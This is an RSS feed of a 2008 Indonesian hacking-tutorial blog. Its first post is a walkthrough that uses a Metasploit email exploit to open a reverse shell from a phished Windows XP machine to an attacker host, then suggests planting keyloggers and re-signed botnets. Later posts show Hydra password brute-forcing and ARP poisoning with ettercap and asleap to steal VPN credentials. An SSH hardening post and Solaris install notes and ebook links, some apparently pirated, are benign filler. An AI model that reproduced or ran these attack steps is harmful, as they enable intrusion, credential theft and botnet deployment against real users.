<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Sharing Tutorial</title>
	<atom:link href="http://laharisi.solaris.or.id/?feed=rss2" rel="self" type="application/rss+xml" />
	<link>http://laharisi.solaris.or.id</link>
	<description>Just Share Tutorial..</description>
	<lastBuildDate>Mon, 15 Sep 2008 05:12:32 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>Defeating Windows XP all version through outlook express</title>
		<link>http://laharisi.solaris.or.id/?p=13</link>
		<comments>http://laharisi.solaris.or.id/?p=13#comments</comments>
		<pubDate>Thu, 04 Sep 2008 23:35:26 +0000</pubDate>
		<dc:creator>laharisi</dc:creator>
				<category><![CDATA[security & hacking]]></category>

		<guid isPermaLink="false">http://laharisi.solaris.or.id/?p=13</guid>
		<description><![CDATA[ehhmmmmmmmm&#8230;&#8230;&#8230;.akhirnya nulis lagi&#8230; kali ini coba saya demonstrasikan cara take over komputer windows all version+full pacth+antivirus updated memanfaatkan kelemahan outlook express&#8230;. kali ini saya menggunakan exploit ani_loadimage_chunksize.kebetulan dah ada didalam metasploit&#8230; exploit ini akan meng-exploitasi file USER32.dll ( LoadAniIcon() function ).. untuk lebih jelasnya silahkan lihat di &#60;a href=&#8221;http://downloads.securityfocus.com/vulnerabilities/exploits/ani_loadimage_chunksize2.rb&#8221; exploit ini bersifat remote.artinya hacker bisa [...]]]></description>
			<content:encoded><![CDATA[<p>ehhmmmmmmmm&#8230;&#8230;&#8230;.akhirnya nulis lagi&#8230;</p>
<p>kali ini coba saya demonstrasikan cara take over komputer windows all version+full pacth+antivirus updated memanfaatkan kelemahan outlook express&#8230;.<br />
kali ini saya menggunakan exploit ani_loadimage_chunksize.kebetulan dah ada didalam metasploit&#8230;<br />
exploit ini akan meng-exploitasi file USER32.dll ( LoadAniIcon() function )..<br />
untuk lebih jelasnya silahkan lihat di &lt;a href=&#8221;http://downloads.securityfocus.com/vulnerabilities/exploits/ani_loadimage_chunksize2.rb&#8221;</a><br />
exploit ini bersifat remote.artinya hacker bisa melakukan bind atau reverse command prompt pada komputer korban..</p>
<p>Kasus :<br />
hacker akan mencoba mengirim email phising ke target..setelah target membaca email tersebut dengan outlook express,hacker berhasil melakukan bind command prompt komputer korban<br />
disini saya menggunakan server email zimbra pada komputer opensuse ( 172.18.3.188 ) dengan doma<br />
Ok&#8230;Here We go&#8230;&#8230;</p>
<p>linux yang saya gunakan adalah backtrack 3&#8230;my favourite linux..</p>
<p>1. checking network connection </p>
<blockquote><p>
bt ~ # ifconfig eth0<br />
eth0      Link encap:Ethernet  HWaddr 00:0C:29:5C:65:69<br />
          inet addr:172.18.100.100  Bcast:172.18.255.255  Mask:255.255.0.0<br />
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1<br />
          RX packets:40687 errors:0 dropped:0 overruns:0 frame:0<br />
          TX packets:728 errors:0 dropped:0 overruns:0 carrier:0<br />
          collisions:0 txqueuelen:1000<br />
          RX bytes:4219258 (4.0 MiB)  TX bytes:877329 (856.7 KiB)<br />
          Interrupt:16 Base address:0&#215;2000
</p></blockquote>
<p>bisa di lihat bahwa ip attacker 172.18.100.100</p>
<p><span id="more-13"></span><br />
2. move to metapsploit directory</p>
<blockquote><p>
   bt framework3 # cd /pentest/exploits/framework3<br />
bt framework3 # ls<br />
README          framework3@  modules/     msfelfscan*  msfpayload*  scripts/<br />
data/           karma.rc     msfcli*      msfencode*   msfpescan*   tools/<br />
documentation/  lib/         msfconsole*  msfgui*      msfweb*<br />
external/       load.gif     msfd*        msfopcode*   plugins/<br />
bt framework3 #
</p></blockquote>
<p>3.  executing metasploit</p>
<blockquote><p>
bt framework3 # ./msfconsole </p>
<p>                __.                       .__.        .__. __.<br />
  _____   _____/  |______    ____________ |  |   ____ |__|/  |_<br />
 /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\<br />
|  Y Y  \  ___/|  |  / __ \_\___ \ |  |_&gt; &gt;  |_(   )  ||  |<br />
|__|_|  /\___  &gt;__| (____  /____  &gt;|   __/|____/\____/|__||__|<br />
      \/     \/          \/     \/ |__|</p>
<p>       =[ msf v3.2-release<br />
+ -- --=[ 294 exploits - 124 payloads<br />
+ -- --=[ 17 encoders - 6 nops<br />
       =[ 58 aux</p>
<p>msf &gt; msf &gt; use windows/email/ani_loadimage_chunksize<br />
msf exploit(ani_loadimage_chunksize) &gt; set PAYLOAD windows/shell_reverse_tcp<br />
PAYLOAD =&gt; windows/shell_reverse_tcp<br />
msf exploit(ani_loadimage_chunksize) &gt; set RHOST ian.org<br />
RHOST =&gt; ian.org<br />
msf exploit(ani_loadimage_chunksize) &gt; set LHOST 172.18.100.100<br />
LHOST =&gt; 172.18.100.100<br />
msf exploit(ani_loadimage_chunksize) &gt; set LPORT 443<br />
LPORT =&gt; 443<br />
msf exploit(ani_loadimage_chunksize) &gt;<br />
msf exploit(ani_loadimage_chunksize) &gt; set RPORT 25<br />
RPORT =&gt; 25<br />
msf exploit(ani_loadimage_chunksize) &gt; set MAILFROM ian@hacking.com<br />
MAILFROM =&gt; ian@hacking.com<br />
msf exploit(ani_loadimage_chunksize) &gt; set MAILTO laharisi@ian.org<br />
MAILTO =&gt; laharisi@ian.org<br />
msf exploit(ani_loadimage_chunksize) &gt; exploit
</p></blockquote>
<p>note :<br />
MAILFROM : alamt email hacker<br />
MAILTO   : alamt email korban<br />
RHOST : domain komputer korban<br />
LHOST : alamt komputer hacker<br />
PAYLOAD : windows/shell_reverse_tcp ( melakukan reverse shell terhadap command prompt komputer korban )</p>
<p>4..ketika exploit di jalankan,exploit akan mengirim email ke alamat yang sudah di tentukan.</p>
<blockquote><p>
msf exploit(ani_loadimage_chunksize) &gt; exploit<br />
[*] Started reverse handler<br />
[*] Connecting to SMTP server ian.org:25&#8230;<br />
[*] SMTP: 220 ian.ian.org ESMTP Postfix<br />
[*] SMTP: 250-ian.ian.org<br />
250-PIPELINING<br />
250-SIZE 10240000<br />
250-VRFY<br />
250-ETRN<br />
250-STARTTLS<br />
250-ENHANCEDSTATUSCODES<br />
250-8BITMIME<br />
250 DSN<br />
[*] SMTP: 250 2.1.0 Ok<br />
[*] SMTP: 250 2.1.5 Ok<br />
[*] Sending the message (701857 bytes)&#8230;<br />
[*] SMTP: 354 End data with .<br />
[*] SMTP: 250 2.0.0 Ok: queued as D7A17113913<br />
[*] Closing the connection&#8230;<br />
[*] SMTP: 221 2.0.0 Bye<br />
[*] Waiting for a payload session (backgrounding)&#8230;<br />
msf exploit(ani_loadimage_chunksize) &gt;
</p></blockquote>
<p>5..ketika korban membuka email tersebut dengan outlook express maka komputer korban akan membuka UNPRIVILIGED PORT yang melakukan reverse ke command prompt ( ingat PAYLOAD diatas ).kkkkkk..</p>
<p>6.. apa yang terjadi pada konsole komputer hacker..????hacker berhasil mendapatkan sebuah sesi koneksi ke komputer korban dengan hak administrator.. </p>
<blockquote><p>
msf exploit(ani_loadimage_chunksize) &gt; [*] Command shell session 1 opened (172.18.100.100:443 -&gt; 172.18.2.151:1039)<br />
msf exploit(ani_loadimage_chunksize) &gt; sessions -l  </p>
<p>Active sessions<br />
===============</p>
<p>  Id  Description    Tunnel<br />
  &#8212;  &#8212;&#8212;&#8212;&#8211;    &#8212;&#8212;<br />
  1   Command shell  172.18.100.100:443 -&gt; 172.18.2.151:1039
</p></blockquote>
<p>7&#8230;waktunya take over..just type session -i </p>
<blockquote><p>
msf exploit(ani_loadimage_chunksize) &gt; sessions -i 1<br />
[*] Starting interaction with 1&#8230;</p>
<p>Microsoft Windows XP [Version 5.1.2600]<br />
(C) Copyright 1985-2001 Microsoft Corp.</p>
<p>C:\Documents and Settings\master&gt;<br />
C:\Documents and Settings\master&gt;ipconfig<br />
ipconfig</p>
<p>Windows IP Configuration</p>
<p>Ethernet adapter Local Area Connection:</p>
<p>        Connection-specific DNS Suffix  . :<br />
        IP Address. . . . . . . . . . . . : 172.18.2.151<br />
        Subnet Mask . . . . . . . . . . . : 255.255.0.0<br />
        Default Gateway . . . . . . . . . : 172.18.2.1</p>
<p>C:\Documents and Settings\master&gt;
</p></blockquote>
<p>akhirnya kita bisa mendapatkan command prompt komputer korban&#8230;..uuhhhhhhhhh<br />
apakah hacking sampe disini..???it&#8217;s not over&#8230;.hacking has just began..<br />
setelah itu hacker bisa meng-upload berbagai program misalnya keylogger,virus,worm..kalo saya seh lebih senang Meng-Upload BOTNET such as spyboot,RX-boot aka spike..tapi jangan lupa ganti signature dari bot agar tidak di kenali oleh anti virus.configuring own irc server &#8211; &gt; uploading botnet &#8211;&gt; &#8230;.??!! masih banyak&#8230;gk akan saya jelaskan&#8230;cukup sampe disini&#8230;</p>
<p>Tutorial ini dibuat hanya untuk kepentingan penelitian aja..tidak digunakan untuk hal2 yang merusak..</p>
<p>Thist Tutorial Dedicated to my sweet heart (H***Y)</p>
]]></content:encoded>
			<wfw:commentRss>http://laharisi.solaris.or.id/?feed=rss2&amp;p=13</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Securing ssh server</title>
		<link>http://laharisi.solaris.or.id/?p=10</link>
		<comments>http://laharisi.solaris.or.id/?p=10#comments</comments>
		<pubDate>Tue, 19 Aug 2008 13:59:52 +0000</pubDate>
		<dc:creator>laharisi</dc:creator>
				<category><![CDATA[security & hacking]]></category>

		<guid isPermaLink="false">http://laharisi.solaris.or.id/?p=10</guid>
		<description><![CDATA[Lets move &#8230;&#8230;&#8230; sesuai dengan topik.kali ini yang akan di jelaskan adalah cara mengamankan ssh server,,,,, ssh merupakakan protocol autentikasi yang memungkinkan seseorang me-remote komputer yang menjalankan service ssh ( misalnya openssh).. cara2 untuk mengamankan komputer yang menjalankan service ssh adalah : 1. edit file sshd_conf ( vim /etc/ssh/sshd_conf ) 2. berikut adalah variabe2 yang [...]]]></description>
			<content:encoded><![CDATA[<p>Lets move &#8230;&#8230;&#8230;</p>
<p>sesuai dengan topik.kali ini yang akan di jelaskan adalah cara mengamankan ssh server,,,,,<br />
ssh merupakakan protocol autentikasi yang memungkinkan seseorang me-remote komputer yang menjalankan service ssh ( misalnya openssh)..</p>
<p>cara2 untuk mengamankan komputer yang menjalankan service ssh adalah : </p>
<p>1. edit file sshd_conf ( vim /etc/ssh/sshd_conf )<br />
2. berikut adalah variabe2 yang harus diganti :<br />
   &#8211; ganti variable &#8220;port 22&#8243; ke variable &#8220;port  misalnya port 123</p>
<blockquote><p>Port 2222 </p></blockquote>
<p>  &#8211; ganti variable &#8220;PermitRootLogin yes&#8221; menjadi &#8220;PermitRootLogin no&#8221;  dan aktifkan pilihan StrictModes</p>
<blockquote><p>PermitRootLogin no<br />
                       StrictModes</p></blockquote>
<p>  hal ini untuk mencegah akses root / administaror ke server..kenapa..??? ini bisa di manfaatkan oleh &#8220;orang yang tidak bertanggung jawab&#8221; untuk melakukan bruteforce&#8221;..<br />
<span id="more-10"></span><br />
 &#8211; Ubah variable &#8220;MaxAuthTries 6&#8243; menjadi &#8220;MaxAuthTries 2&#8243;</p>
<blockquote><p> MaxAuthTries 2</p></blockquote>
<p>    Ini berari Maximal user yang login ke server sebanyak 2 kali saja..ini untuk mengurangi dampak serangan bruteforce</p>
<p>setelah itu tinggal restart service sshnya</p>
<blockquote><p>/etc/init.d/ssh restart</p></blockquote>
<p>cara lain adalah dengan menggunakan firewall pada port tersebut..contohnya firewall dengan menggunakan iptables ( linux ) :<br />
1.filter port ssh ( misalnya 22 )..misalnya user yang di izinkan melakukan koneksi ke server ssh adalah user dengan ip 172.18.3.188 dengan alamat mac address 00:11:22:33:44:55,maka contoh filteringnya adalah : </p>
<blockquote><p>ian:/etc/ssh #iptables -A INPUT -p tcp &#8211;dport 22 -s 172.18.3.188 -m mac &#8211;mac 00:11:22:33:44:55 -j ACCEPT </p></blockquote>
<p>2.setelah itu blok port ssh..</p>
<blockquote><p>ian:/etc/ssh #iptables -A INPUT -p tcp &#8211;dport 22 -j DROP</p></blockquote>
<p>ini sekedar untuk pengaman yang standar aja..untuk pengamanan lebih lanjut kan menggunakan PAM ( plugbble authentic method )&#8230;tapi nanti di tutorial slanjuntnya&#8230;:D<br />
so be patience&#8230;.pissssssssssssss</p>
<p>this tutorial dedicated to someone&#8230;(H*****y)</p>
]]></content:encoded>
			<wfw:commentRss>http://laharisi.solaris.or.id/?feed=rss2&amp;p=10</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>BruteFoce With Hydra</title>
		<link>http://laharisi.solaris.or.id/?p=8</link>
		<comments>http://laharisi.solaris.or.id/?p=8#comments</comments>
		<pubDate>Tue, 19 Aug 2008 13:02:04 +0000</pubDate>
		<dc:creator>laharisi</dc:creator>
				<category><![CDATA[security & hacking]]></category>

		<guid isPermaLink="false">http://laharisi.solaris.or.id/?p=8</guid>
		<description><![CDATA[nulis lagi nulis lagi&#8230;&#8230;tapi gpp&#8230;soalnya lagi senang bangat nulis&#8230; kali ini saya coba menjeskan tentang cara bruteforce password dengan hydra,,,, hydra adalah tools bruteforce yang sangat2 terkenal di kalangan para dedemit maya&#8230;untuk info lebih lanjut tentang hydra silahkan lihat di situs resminya hydra sendiri terbagi menjadi 2 mode penggunaan,yaitu mode text dan mode grafik ( [...]]]></description>
			<content:encoded><![CDATA[<p>nulis lagi nulis lagi&#8230;&#8230;tapi gpp&#8230;soalnya lagi senang bangat nulis&#8230;</p>
<p>kali ini saya coba menjeskan tentang cara bruteforce password dengan hydra,,,,<br />
hydra adalah tools bruteforce yang sangat2 terkenal di kalangan para dedemit maya&#8230;untuk info lebih lanjut tentang hydra<br />
silahkan lihat di situs resminya <a href="http://www.thc.org/thc-hydra/"></a></p>
<p>hydra sendiri terbagi menjadi 2 mode penggunaan,yaitu mode text dan mode grafik ( gui )&#8230;<br />
kali ini yang akan saya jelaskan adalah cara menggunakan hydra pada modus text..<br />
hydra bisa digunakan untuk melakukan password cracking ( bruteforce method ) pada berbagai maca protocol..mulai dari cisco,telnet,sshv2,snmp,http metode get dll..<br />
kebetulan hydra yang saya gukanan adalah hydra versi baru yang uda ada pada backtrack 3..<br />
Ok here we go&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;..</p>
<p>ini adalah output hydra ketika di ketik pada console backtrack,,</p>
<blockquote><p>
bt ~ # hydra<br />
Hydra v5.4 [http://www.thc.org] (c) 2006 by van Hauser / THC </p>
<p>Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]<br />
 [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]<br />
 server service [OPT]</p>
<p>Options:<br />
  -R        restore a previous aborted/crashed session<br />
  -S        connect via SSL<br />
  -s PORT   if the service is on a different default port, define it here<br />
  -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE<br />
  -p PASS  or -P FILE try password PASS, or load several passwords from FILE<br />
  -e ns     additional checks, &#8220;n&#8221; for null password, &#8220;s&#8221; try login as pass<br />
  -C FILE   colon seperated &#8220;login:pass&#8221; format, instead of -L/-P options<br />
  -M FILE   server list for parallel attacks, one entry per line<br />
  -o FILE   write found login/password pairs to FILE instead of stdout<br />
  -f        exit after the first found login/password pair (per host if -M)<br />
  -t TASKS  run TASKS number of connects in parallel (default: 16)<br />
  -w TIME   defines the max wait time in seconds for responses (default: 30)<br />
  -v / -V   verbose mode / show login+pass combination for each attempt<br />
  server    the target server (use either this OR the -M option)<br />
  service   the service to crack. Supported protocols: telnet ftp pop3[-ntlm]   imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco  cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5   rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere  teamspeak sip vmauthd<br />
  OPT       some service modules need special input (see README!)</p>
<p>Use HYDRA_PROXY_HTTP/HYDRA_PROXY_CONNECT and HYDRA_PROXY_AUTH env for a proxy.<br />
Hydra is a tool to guess/crack valid login/password pairs &#8211; use allowed only<br />
for legal purposes! If used commercially, tool name, version and web address<br />
must be mentioned in the report. Find the newest version at http://www.thc.org
</p></blockquote>
<p>basic dari penggunaan hydra misalnya : </p>
<blockquote><p> hydra   IP_target protocol -l username  -P password list  -v(verbose options)  </p></blockquote>
<p>contohnya<br />
bila kita ingin melakukan password cracking pada mesin windows yang menjalakan servis telnet,maka cara bruteforce dengan hydra misalnya : </p>
<blockquote><p>hydra 10.14.10.2 telnet -l Administrator -P wordlist -v</p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://laharisi.solaris.or.id/?feed=rss2&amp;p=8</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hacking Virtual Private Network&#8230;</title>
		<link>http://laharisi.solaris.or.id/?p=7</link>
		<comments>http://laharisi.solaris.or.id/?p=7#comments</comments>
		<pubDate>Tue, 19 Aug 2008 12:15:54 +0000</pubDate>
		<dc:creator>laharisi</dc:creator>
				<category><![CDATA[security & hacking]]></category>

		<guid isPermaLink="false">http://laharisi.solaris.or.id/?p=7</guid>
		<description><![CDATA[ehhhhhhhhhhhmmmmmmm,,,,, ok,kali ini saya akan menjelaskan tentang cara hacking vpn connection dengan tujuan untuk mendapatkan username dan password untuk melakukan koneksi ke serper vpn&#8230;. recruitment : 1.linux backtrack 2.cokelat ( buat cemilan,,hhahaha ) 3.green teah&#8230;kekna asyik juga&#8230;:D berikut adalah data2 detail mengenai jaringan yang akan di hack. &#8211; ip server vpn 192.168.1.1 &#8211; gateway LAN [...]]]></description>
			<content:encoded><![CDATA[<p>ehhhhhhhhhhhmmmmmmm,,,,,</p>
<p>ok,kali ini saya akan menjelaskan tentang cara hacking vpn connection dengan tujuan untuk mendapatkan username dan password untuk melakukan koneksi ke serper vpn&#8230;.<br />
recruitment :<br />
1.linux backtrack<br />
2.cokelat ( buat cemilan,,hhahaha )<br />
3.green teah&#8230;kekna asyik juga&#8230;:D<br />
berikut adalah data2 detail mengenai jaringan yang akan di hack.<br />
 &#8211; ip server vpn 192.168.1.1<br />
 &#8211; gateway LAN 10.14.10.1<br />
 &#8211; ip attacker 10.14.10.6<br />
 &#8211; ip target  10.14.10.4</p>
<p>Ok kita mulai saja aksinya..cieeeeeeee&#8230;&#8230;&#8230;..</p>
<p>1.kita harus meredirect traffic korban.yang tadinya dari komputer target &#8212;-&gt; gateway &#8212;- &gt;server vpn menjadi<br />
  komputer target &#8212;&#8212;-&gt; komputer attacker &#8212;&#8211;&gt; gateway &#8212;&#8212;&gt; server vpn.<br />
  teknik ini sering dinamakan dengan arp poisoning&#8230;&#8230;<br />
  tools yang saya gunakan ettercap.kebetulan uda ada di dalam backtack..so tinggal di pake doang..<br />
 disini saya menggunakan ettercap pada modus text&#8230;soalnya lebih enak seh..wkwkwkwkkw<br />
  contoh sintaxnya <code>ettercap -T -q -M ARP /ip target/ /ip gateway/</code><br />
 jadi pada kasus ini akan menjadi <code> ettercap -T -q -M ARP /10.14.10.4/ /10.14.10.1/</code><br />
 &#8211; Optiosn T : modus text<br />
 &#8211; Options -q ; ettercap di jalankan pada keadaan tenang / outputnya tdak terlalu banyak<br />
 &#8211; Options -M : menggunakan teknik ARP spoofing<br />
 output dari sintax di atas adalah<br />
  <img src="http://i229.photobucket.com/albums/ee235/laharisi/baru2.jpg" WIDTH="700" HEIGHT="400" alt="ettercap run...!!!!!" /><br />
<span id="more-7"></span></p>
<p> 2.pada kali ini saya menggunakan teknik brutefoce dengan menggunakan file kamus ( wordlist) dengan harapan<br />
   password dari target ada dalam file tersebut&#8230;:D<br />
   untuk itu saya akan membuat file hash dan file index dari wordlist yang sudah ada&#8230;..program yang saya gunakan<br />
  adalah genkeys..ini adalah conntohnya<br />
  <img src="http://i229.photobucket.com/albums/ee235/laharisi/ian.jpg" alt="genkeys " /><br />
 hasilnya misalnya berupa file word.idx word.has ( penamaan file terserah aja )</p>
<p> &#8211; OPtions -r : meminta inputan dari sebuah file ( dalam hal ini file wordlist )<br />
 &#8211; Options -f : akan membuat output dari file wordlist menjadi file2 hash<br />
 &#8211; Options -f : akan membuat output berupa file index dari wordlist<br />
  kedua file baru tersebut dibutuhkan oleh program vpn crack yang akan kita gunakan ( asleap )</p>
<p>3. untuk melakukan bruteforce saya menggunakan program asleap..yeaaahhh,,,tapi yang sy gunakan adalah asleap bawaan dari backtrack 2..soalnya asleap pada backtrack 3 aga2 eror <img src='http://laharisi.solaris.or.id/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> ..<br />
 waktunya beraksi..<br />
 saya akan melakukan cracking dengan program asleap misalnya<br />
 <img src="http://i229.photobucket.com/albums/ee235/laharisi/baru3.jpg" alt="program asleap" /></p>
<p> &#8211; Options -i : menunjukkan interface/ethernet yang di gunakan..misalnya eth0<br />
 &#8211; options -f : meminta inputan dari file hash yang uda kita buat tadi..( lihat point 2 diatas )<br />
 &#8211; Options -n  : meminta inputan dari fle index yang uda di buat&#8230;.</p>
<p>ketika target melakukan koneksi ke server vpn,kita bisa melihat output koneksinya dari program ettercap yang kita jalankan tadi&#8230;.<br />
 <img src="http://i229.photobucket.com/albums/ee235/laharisi/baru5-1.jpg" alt="ettercap" /></p>
<p>apa yang terjadi&#8230;???kita bisa melihat username dan password dari target dengan program asleap diatas..<br />
ini hasilnya ..</p>
<p><img src="http://i229.photobucket.com/albums/ee235/laharisi/baru4.jpg" alt="hasil cracking dengan asleap" /></p>
<p>akhirnya kita bisa melihat username dan password dari target yang melakukan koneksi&#8230;&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://laharisi.solaris.or.id/?feed=rss2&amp;p=7</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Free Solaris ebook</title>
		<link>http://laharisi.solaris.or.id/?p=6</link>
		<comments>http://laharisi.solaris.or.id/?p=6#comments</comments>
		<pubDate>Sat, 16 Aug 2008 06:57:18 +0000</pubDate>
		<dc:creator>laharisi</dc:creator>
				<category><![CDATA[Learning Solaris]]></category>

		<guid isPermaLink="false">http://laharisi.solaris.or.id/?p=6</guid>
		<description><![CDATA[1.Solaris 10: The Complete Reference (Complete Reference Series) Download 2. Solaris 9 Administration: A Beginner&#8217;s Guide Download 3 Kumpulan berbagai ebook lihat Disini]]></description>
			<content:encoded><![CDATA[<p>1.Solaris 10: The Complete Reference (Complete Reference Series)<br />
<img src="http://images.amazon.com/images/P/0072229985.01.THUMBZZZ.jpg" alt="" /><br />
 <b> <a href="http://www.flazx.com/ebook5213.php">Download</a></b></p>
<p>2. Solaris 9 Administration: A Beginner&#8217;s Guide<br />
  <img src="http://images.amazon.com/images/P/0072223170.01.THUMBZZZ.jpg" alt="" /><br />
<b><a href="http://www.flazx.com/ebook10636.php">Download</a></b></p>
<p>3 Kumpulan berbagai ebook lihat <b><a href="http://debian.yaako.org/ebook/">Disini</a></b></p>
]]></content:encoded>
			<wfw:commentRss>http://laharisi.solaris.or.id/?feed=rss2&amp;p=6</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Installing SunSolaris</title>
		<link>http://laharisi.solaris.or.id/?p=5</link>
		<comments>http://laharisi.solaris.or.id/?p=5#comments</comments>
		<pubDate>Sat, 16 Aug 2008 04:58:54 +0000</pubDate>
		<dc:creator>laharisi</dc:creator>
				<category><![CDATA[Learning Solaris]]></category>

		<guid isPermaLink="false">http://laharisi.solaris.or.id/?p=5</guid>
		<description><![CDATA[Sebeleum melakukan instalasi, ada beberapa system recruitment diantaranya : * RAM ( memory) yang akan di gunakan minimal 512 MB * Space Hard drive m,inimal 10 GB * Kecepatan CPU minimal 400 MHz * Mempunyai DVD /Cdrom drive Sebelum melakukan insalasi tentunya harus punya installer sun solaris..kalau mau gratis silahkan download di http://mirror.its.ac.id/pub/ISO/Solaris disini saya [...]]]></description>
			<content:encoded><![CDATA[<p>Sebeleum melakukan instalasi, ada beberapa system recruitment diantaranya :<br />
* RAM ( memory) yang akan di gunakan minimal 512 MB<br />
* Space Hard drive m,inimal 10 GB<br />
* Kecepatan CPU minimal 400 MHz<br />
* Mempunyai DVD /Cdrom drive</p>
<p>Sebelum melakukan insalasi tentunya harus punya installer sun solaris..kalau mau gratis silahkan download di http://mirror.its.ac.id/pub/ISO/Solaris<br />
disini saya menggunakan SunSolaris 10 x86( DVD ) yang sesuai dengan Spek komputer saya..<br />
Langsung aja dech..</p>
<p>1.Masukan CD/DVD sun solaris<br />
2.Set komputer anda agar bisa boot dari DVD/CDrom<br />
3.setelah boot dari CD/DVD maka akan muncul tulisan<br />
  <code><br />
      Loading stage 2....<br />
      GNU GRUB version 0.95 ( xxK lower /<br />
      xxK upper memory)<br />
  </code><br />
4.Setelah itu akan muncul dialog bootloader grub seperti<br />
    <code><br />
    Solaris<br />
   Solaris Serial Console ttya (headless and rack-mounted systems only)<br />
   Solaris Serial Console ttyb (for1x50, v60x and v65x)<br />
   </code><br />
    pilih pada bagian pertama ( Solaris ) terus tekan enter<br />
<span id="more-5"></span><br />
5. akan keluar kotak dialog baru seperti<br />
    <code><br />
    SunOS Release 5.10 version generic_120012-12 32-bit<br />
Copyright 1983-2005 Sun Microsystems, Inc. All rights reserved.<br />
Use is subject to license terms.<br />
Configuring devices.</p>
<p>  1. Solaris Interactive (default)<br />
  2. Custom JumpStart<br />
  3. Solaris Interactive Text (Desktop session)<br />
  4. Solaris Interactive Text (console session)<br />
  5. Apply driver updates<br />
  6. Single user shell<br />
  Automatically continuing in xx seconds</p>
<p> (timeout)<br />
  </code><br />
  bagian ini menentukan metode cara instalasi..menggunakan command line atau Deskop ( GUI )&#8230;.kebetulan saya  menggunakan pilihan pertama ( default ).setelah tekan enter..</p>
<p>6.ehh muncul lagi tulisan yang &#8220;aneh2&#8243;<br />
   <code><br />
   Solaris Interactive</p>
<p>Using install cd in /dev/dsk/c1t0d0p0<br />
Using RPC Bootparams for network configuration information.<br />
Attempting to configure interface nge0...<br />
Skipped interface nge0<br />
Setting up Java. Please wait...<br />
Extracting windowing system. Please wait...<br />
Beginning system identification...<br />
Searching for configuration files(s)...<br />
Search complete.<br />
Discovering additional network configuration...</p>
<p>Starting Solaris Interactive (graphical user interface) Installation.</p>
<p>   You must respond to the first question within 30 seconds or the installer<br />
   proceeds in a non-window environment (console mode).</p>
<p>   If the screen becomes blank or unreadable the installer proceeds in<br />
   console mode.</p>
<p>   If the screen does not properly revert to console mode, restart the<br />
   installation and make the following selection:</p>
<p>   Solaris Interactive Text (Console session)</p>
<p>Press ENTER to continue.<br />
  </code><br />
 tinggal tekan ENTER aja kok..</p>
<p>7 setelah enter di tekan,ehh keluar lagi dialog baru<br />
  <img src="http://www.sun.com/software/solaris/howtoguides/i807_fig_1.gif" alt="" /><br />
  tinggal tekan enter aja..setelh itu dialog baru akan keluar yang meminta kita untuk menentukan bahasa yang di  gunakan<br />
  <img src="http://www.sun.com/software/solaris/howtoguides/i807_fig_2.gif" alt="" /><br />
  bagi yang gk senang bahasa inggris silahkan pilih yang laen..kali ini saya piling English ( 0 )..setelah itu tinggal tekan ENTER lagi</p>
<p>8.pada bagian kanan bawah akan keluar konsole<br />
   <img src="http://www.sun.com/software/solaris/howtoguides/i807_fig_3.gif" alt="" /><br />
   setelah itu nongol lagi dialog popup baru<br />
   <img src="http://www.sun.com/software/solaris/howtoguides/i807_fig_4.gif" alt="" /><br />
   Klik Next Untuk melanjutkan instalasi</p>
<p>9.setelah itu kita berada pada bagian networking&#8230;.ehhhmmm tinggal pilih  networked atau non-networked ..<br />
  saya memilih non-networked&#8230;bagian tentang solaris networking ada di jelaskan pada tutorial berikutnya..</p>
<p>10. setelah itu kita disuruh menentukan hostname..silahkan masukan hostname kesayangan anda.:D<br />
    <img src="http://www.sun.com/software/solaris/howtoguides/i807_fig_5.gif" alt="" /><br />
    Klik Next untuk melanjutkan.<br />
11. keluar lagi dialog  NFSv4 Domain Name<br />
     <img src="http://www.sun.com/software/solaris/howtoguides/i807_fig_6.gif" alt="" /><br />
    Tinggal Klik Next aja..</p>
<p>12. The Time Zone window appears.hehhe..sekali2 pake bahasa inggris..<br />
   <img src="http://www.sun.com/software/solaris/howtoguides/i807_fig_7.gif" alt="" /><br />
    Klik Next and akan muncul<br />
     <img src="http://www.sun.com/software/solaris/howtoguides/i807_fig_8.gif" alt="" /><br />
  tentukan zona waktu setelah itu Klik next&#8230;</p>
<p>13..tentukan settingan waktu sesuai dengan waktu anda<br />
    <img src="http://www.sun.com/software/solaris/howtoguides/i807_fig_9.gif" alt="" /><br />
   setelah itu klik next</p>
<p>14.tentukan password root<br />
 <img src="http://www.sun.com/software/solaris/howtoguides/i807_fig_10.gif" alt="" /><br />
   klik next untuk lanjut </p>
<p>15. new window appear..bagian ini mentukan servies2 remote misalnya telnet,rpc ( nfs ) dll.<br />
 <img src="http://www.sun.com/software/solaris/howtoguides/i807_fig_11.gif" alt="" /><br />
    silahkan pilih yes or no..setelah itu klik next.</p>
<p>16  setelah itu muncul<br />
    <img src="http://www.sun.com/software/solaris/howtoguides/i807_fig_12.gif" alt="" /><br />
     klik next aja</p>
